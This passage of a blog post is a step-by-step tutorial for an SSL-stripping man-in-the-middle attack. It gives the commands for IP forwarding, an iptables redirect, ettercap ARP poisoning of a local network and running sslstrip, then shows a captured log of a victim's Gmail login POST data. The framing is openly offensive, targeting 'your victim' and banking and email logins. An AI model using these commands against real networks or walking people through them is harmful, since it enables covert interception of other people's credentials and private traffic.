However, we have an alternative, sslstrip. This tool effectively turns every connection your victim makes into a plaintext connection, robbing them of their ssl protection and evading all certificate error concerns. It does this by handling the ssl connection with the server by it's self, and replaces all instances of https with http for the victim.
You can download the sslstrip python script here
You have to setup forwarding and a simple iptables prerouting rule before you begin:
root@zombi:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@zombi:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
The iptables rule simply states that all web traffic that is directed to your machine be redirected to port 10000, which is where sslstrip will be listening.
Fire up ettercap to arp poison your victims, here I just mimic the gateway to the whole local network:
root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //
Then run sslstrip:
root@zombi:~/Downloads/sslstrip-0.7# python sslstrip.py -w dump
sslstrip 0.6 by Moxie Marlinspike running...
When your victim(s) visit what is supposed to be a secure page, they are actually interacting with it without any encryption at all, and will receive no ssl certificate errors. Their only hope is to notice the lack of certain signs, such as the "s" or a lock icon, or other indicators depending on their browser. All of the traffic the passes through sslstrip will be saved to the file you specified with the -w flag.
Here's our victim visiting a banking website:
And here's our victim logging into their gmail:
sure enough, if we check the sslstrip log we see:
root@zombi:~/Downloads/sslstrip-0.7# cat dump
2010-03-30 11:41:28,231 SECURE POST Data (www.google.com):
ltmpl=default<mplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=-1464906762657940239<mpl=default<mpl=default&scc=1&GALX=PcWxJ-d1MHk&Email=fakefakefake&Passwd=justanexample&rmShown=1&signIn=Sign+in&asts=
0 comments:
Post a Comment